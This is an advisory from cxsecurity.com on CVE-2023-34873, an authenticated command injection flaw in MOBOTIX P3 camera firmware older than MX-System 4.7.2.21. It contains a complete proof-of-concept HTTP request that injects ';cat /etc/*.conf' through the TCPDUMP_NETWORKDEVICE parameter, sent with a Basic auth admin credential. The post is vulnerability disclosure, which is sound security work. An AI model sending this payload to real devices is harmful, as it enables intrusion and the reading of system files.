MOBOTIX P3 Cameras MX-System <4.7.2.21 Authenticated Remote Code Execution Vulnerability

2024.02.02
tr mrgedik (TR) tr
Risk: High
Local: Yes
Remote: Yes
CVE: CVE-2023-34873
CWE: CWE-94: Improper Control of Generation of Code (&#039;Code Injection&#039;)

#Summary This vulnerability exists in versions of MOBOTIX P3 Cameras x14/x24/x15/x25, T24M/T25M prior to MX-System 4.7.2.21 firmware. Due to the lack of input validation in the request sent to "/admin/tcpdump", this vulnerability leads to authenticated remote code execution. #Exploitation In the affected module, tcpdump integration through the network interface has been observed via the web portal. The input in the "TCPDUMP_NETWORKDEVICE" parameter allows bypassing input validation by using the ";" character, enabling the execution of system commands. # Proof of concept POST /admin/tcpdump HTTP/1.1 Host: 127.0.0.1:5003 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 153 Upgrade-Insecure-Requests: 1 Authorization: Basic YWRtaW46bWVpbnNt Connection: close TCPDUMP_NETWORKDEVICE=%3bcat+/etc/*.conf&TCPDUMP_PROTOCOL=all&TCPDUMP_CAPTURETIMEOUT=1&TCPDUMP_IGNORE_IP=127.0.0.1&START_CAPTURE=Ba%C5%9Flat%2FDurdur


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top